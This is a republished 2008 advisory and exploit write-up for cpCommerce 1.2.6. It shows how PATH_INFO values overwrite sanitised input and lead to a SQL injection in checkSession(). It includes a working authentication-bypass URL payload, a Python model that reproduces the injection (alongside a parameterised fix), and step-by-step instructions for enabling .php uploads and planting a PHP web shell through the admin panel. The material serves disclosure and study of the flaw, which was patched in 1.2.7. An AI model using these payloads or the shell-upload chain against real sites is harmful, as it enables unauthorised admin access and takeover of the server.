cpCommerce 1.2.6 (URL Rewrite) Input variable overwrite / Auth bypass PoC
Source: vfocus.net  Author: vfocus  Published: 2008-12-01
 Author:	girex
 Homepage:	girex.altervista.org

 CMS:		cpCommerce 1.2.6
 Site:		http://cpcommerce.cpradio.org/

 Bug: 		URL Rewrite -> Input variables overwrite
 PoC:		Auth bypass -> Shell upload

 Note:		Works regardless of php.ini settings (magic_quotes_gpc never touches PATH_INFO)

 Vendor informed:		23/11/08
 cpCommerce 1.2.7 released: 	30/11/08 
 Public advisory:		30/11/08

-------------------------------------------------------------------------------------------------

 CMS Description: cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.

-------------------------------------------------------------------------------------------------

 Vulnerability discussion:
 cpCommerce forces register_globals off with ini_set() and copies every GET and POST
 variable into the $input array after running it through SanitizeValue() (htmlentities,
 removal of "..", and addslashes() unless magic_quotes_gpc already escaped the value).

 lines: 16-32
 file: /functions/sanitize_value.func.php 

      function SanitizeInput()
      {
        $input = array();
        if (isset($_GET) && sizeof($_GET) > 0 && is_array($_GET))
        {
          foreach ($_GET as $key => $val)
          {
            if (is_array($val))
            {
              $input[$key] = SanitizeArray($val);   // recursive variant of SanitizeValue()
            }
            else
            {
              $input[$key] = SanitizeValue($val);
            }
          }
        }
        // the same loop is repeated for $_POST (POST values overwrite GET values with the same key)
        if (isset($_POST) && sizeof($_POST) > 0 && is_array($_POST))
        {
          foreach ($_POST as $key => $val)
          {
            $input[$key] = is_array($val) ? SanitizeArray($val) : SanitizeValue($val);
          }
        }
        return $input;
      }

  The $_POST loop mirrors the $_GET one, and the function returns the filled $input array.
  
 lines: 3-13
 file: /functions/sanitize_value.func.php

      function SanitizeValue($value)
      {
        // htmlentities(ENT_QUOTES) turns ' into &#039; and " into &quot;, then ".." is stripped;
        // addslashes() is applied only when magic_quotes_gpc has not already escaped the value
        if (!get_magic_quotes_gpc())
        {
          return addslashes(preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES)));
        }
        else
        {
          return preg_replace("/(\.\.)/i", "", htmlentities($value, ENT_QUOTES));
        }
      }

-------------------------------------------------------------------------------------------------
  
 Let's look at _functions.php (the main file)

 lines: 128-132
 file: _functions.php

      $input = array();
      if ((isset($_GET) && sizeof($_GET) > 0) || (isset($_POST) && sizeof($_POST) > 0))
      {
         $input = SanitizeInput();
      }


 So all GET and POST vars are sanitized and stored in the $input array.
 Let's proceed in _functions.php...

-------------------------------------------------------------------------------------------------

 lines 156-173
 file: _functions.php
 
      if (isset($_SERVER['PATH_INFO']) && strlen($_SERVER['PATH_INFO']) != 0)
      {
        $rewriteValues = array();
        // strip the leading slash and, when present, the trailing one
        if (strrpos($_SERVER['PATH_INFO'], '/') == strlen($_SERVER['PATH_INFO']) - 1)
        {
          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 2));
        }
        else
        {
          $rewriteValues = split('/', substr($_SERVER['PATH_INFO'], 1, strlen($_SERVER['PATH_INFO']) - 1));
        }

        // /k1/v1/k2/v2 -> $input['k1'] = 'v1', $input['k2'] = 'v2' ...
        // no SanitizeValue() here, and this runs AFTER SanitizeInput(), so it
        // overwrites whatever GET/POST put into $input under the same key
        for ($i = 0; $i < sizeof($rewriteValues); $i += 2)
        {
          $input[$rewriteValues[$i]] = $rewriteValues[$i + 1];
        }
      }


 $_SERVER['PATH_INFO'] is a server variable that holds the part of the request URL that follows the script name.

 For example: GET http://localhost/index.php/helloworld
 /index.php is the requested script and $_SERVER['PATH_INFO'] contains /helloworld

 As the previous snippet shows, we can set arbitrary keys of $input with
 GET index.php/key/value/

 Because the rewrite loop runs after SanitizeInput() and assigns the PATH_INFO pairs verbatim,
 we can overwrite any input of this CMS with a value that never went through SanitizeInput()
 (no htmlentities, no addslashes) and that magic_quotes_gpc never touched, since magic quotes
 only escape GET, POST and COOKIE data. The web server also percent-decodes PATH_INFO before
 PHP sees it, so %27 arrives as a raw single quote.
 
 Here is how to exploit it.

-------------------------------------------------------------------------------------------------
 
 lines: 13-20
 code: /actions/login.act.php

      // $input['email'] and $input['password'] may have been set through PATH_INFO
      if (checkSession($input['email'], md5($input['password']))) {
        $_SESSION['cpTemplate'] = $_SESSION['cpInfo']['template'];
        $return['url'] = urldecode("{$input['returnurl']}");
      } else {
        $_SESSION['loginerror'] = TRUE;
        $return['url'] = urldecode("{$input['returnurl']}");
      }

 If checkSession returns true we are logged in...

 lines: 3-9
 code: /functions/account_info.func.php

      function checkSession($email,$pass) {
        global $config, $db_chooser;

         // $email is interpolated straight into the SQL string; $pass is already an md5 hex digest
         $sql['accounts'] = "select `id_account`, `level` from " . $db_chooser->Accounts() . " where " .
                           "email='$email' and pass='$pass'";

         $accounts = $db_chooser->sql_query($sql['accounts']);
         // ... (the excerpt ends here; the rest of the function evaluates $accounts)

 We can manipulate this query: a SQL injection that bypasses authentication and
 logs us in with admin privileges...

-------------------------------------------------------------------------------------------------

 If we set $input['email'] to  ' OR id_account=1#  with the PATH_INFO trick (index.php/email/value/),
 the resulting query becomes:

      select `id_account`, `level` from cpAccounts where email='' OR id_account=1#' and pass='<md5>'

 Everything after the # is a MySQL comment, so the password check disappears and the query returns
 the row with id_account=1, the first account created, assumed here to be the administrator.

-------------------------------------------------------------------------------------------------

 PoC Auth Bypass:  

 GET http://[host]/[path]/index.php/email/%27%20OR%20id_account=1%23/?action=login&submit=Login&returnurl=index.php
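
 To make the two mechanisms above concrete (the PATH_INFO rewrite loop of _functions.php and the
 string-built query of checkSession()), here is an added Python model written for this write-up; it
 is not cpCommerce code. It reimplements SanitizeValue(), SanitizeInput(), the rewrite loop and the
 checkSession() query string, runs the query against a constructed in-memory SQLite table standing in
 for cpAccounts, and builds the PoC URL above. The table contents, the account password and the
 parameterised login variant are assumptions of this example. SQLite has no MySQL-style '#' comment,
 so the variant of the payload that is actually executed ends in '-- ' instead.

```python
"""Model of the cpCommerce 1.2.6 input path and the PATH_INFO overwrite (added example)."""
import hashlib
import re
import sqlite3
from urllib.parse import quote, unquote

# Payload from the advisory. '#' starts a comment in MySQL; SQLite, used for the
# offline demo below, only knows '-- ', so an equivalent variant is kept as well.
PAYLOAD_MYSQL = "' OR id_account=1#"
PAYLOAD_SQLITE = "' OR id_account=1-- "


def sanitize_value(value, magic_quotes_gpc=False):
    """Python equivalent of SanitizeValue(): htmlentities(ENT_QUOTES), strip '..',
    then addslashes() unless magic_quotes_gpc already did it. Strings only."""
    for raw, ent in (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"),
                     ('"', "&quot;"), ("'", "&#039;")):
        value = value.replace(raw, ent)
    value = re.sub(r"\.\.", "", value)
    if not magic_quotes_gpc:  # addslashes(): backslash, single and double quote
        value = value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return value


def sanitize_input(get, post):
    """SanitizeInput(): every GET and POST value passes through sanitize_value()."""
    return {k: sanitize_value(v) for src in (get, post) for k, v in src.items()}


def apply_path_info(inp, path_info):
    """The rewrite loop of _functions.php: /k1/v1/k2/v2[/] pairs taken from
    PATH_INFO are assigned into $input verbatim, after SanitizeInput() has run."""
    if not path_info:
        return inp
    body = path_info[1:-1] if path_info.endswith("/") else path_info[1:]
    parts = body.split("/")
    for i in range(0, len(parts), 2):
        inp[parts[i]] = parts[i + 1] if i + 1 < len(parts) else None
    return inp


def build_input(get, post, raw_path_info):
    """What $input holds when login.act.php runs. The web server percent-decodes
    PATH_INFO before PHP sees it, hence unquote()."""
    return apply_path_info(sanitize_input(get, post), unquote(raw_path_info))


def check_session_sql(email, md5_pass):
    """The string concatenation of checkSession() in account_info.func.php."""
    return ("select `id_account`, `level` from cpAccounts "
            f"where email='{email}' and pass='{md5_pass}'")


def poc_url(base="http://[host]/[path]"):
    """The advisory's GET request; '#' must travel as %23, otherwise the browser
    treats it as a fragment and never sends it."""
    return (f"{base}/index.php/email/{quote(PAYLOAD_MYSQL, safe='=')}/"
            "?action=login&submit=Login&returnurl=index.php")


def demo_db():
    """Constructed stand-in for the cpAccounts table (assumed schema and data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table cpAccounts (id_account integer, level text, email text, pass text)")
    conn.execute("insert into cpAccounts values (1, 'admin', 'admin@example.com', ?)",
                 (hashlib.md5(b"correct-horse").hexdigest(),))
    return conn


def _md5_of_password(inp):
    return hashlib.md5((inp.get("password") or "").encode()).hexdigest()


def login_vulnerable(conn, get, post, raw_path_info):
    """login.act.php -> checkSession(): returns the matched row or None."""
    inp = build_input(get, post, raw_path_info)
    sql = check_session_sql(inp.get("email") or "", _md5_of_password(inp))
    return conn.execute(sql).fetchone()


def login_parameterized(conn, get, post, raw_path_info):
    """Hardened variant (ours, not the 1.2.7 fix): same $input handling, but a
    parameterised query, so the unsanitised PATH_INFO value is data only."""
    inp = build_input(get, post, raw_path_info)
    return conn.execute("select id_account, level from cpAccounts where email=? and pass=?",
                        (inp.get("email") or "", _md5_of_password(inp))).fetchone()


if __name__ == "__main__":
    db = demo_db()
    get = {"action": "login", "submit": "Login", "returnurl": "index.php"}
    # 1. The payload as a normal GET parameter: SanitizeValue() removes the quote.
    print(check_session_sql(sanitize_value(PAYLOAD_MYSQL), "<md5>"))
    # 2. The payload via PATH_INFO: lands in $input untouched and rewrites the query.
    print(build_input(get, {}, "/email/" + quote(PAYLOAD_MYSQL, safe="=") + "/")["email"])
    path = "/email/" + quote(PAYLOAD_SQLITE) + "/"
    print(login_vulnerable(db, get, {}, path))      # row for id_account=1
    print(login_parameterized(db, get, {}, path))   # None
    print(poc_url())
```

 Running it prints the neutralised GET variant (email='&#039; OR id_account=1#'), the raw value that
 PATH_INFO delivers, the admin row returned by the concatenated query, None from the parameterised
 one, and the PoC URL from this advisory.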

-------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------

 If you want to upload a shell:

- Log in with the auth bypass PoC
- Go to /[path]/admin/

- Go to General Info -> Configuration
- Add ,php to "What Image Extensions do you want to accept on Uploads?"

- Go to Product -> Create
- Select a valid category
- Fill in the required fields
- Upload your shell.php as the Product Thumbnail Image
- Save everything

 Your shell will be at /[path]/images/products/thumbnails/[name_of_shell]_[product_id].php

-------------------------------------------------------------------------------------------------

# [2008-11-30]

 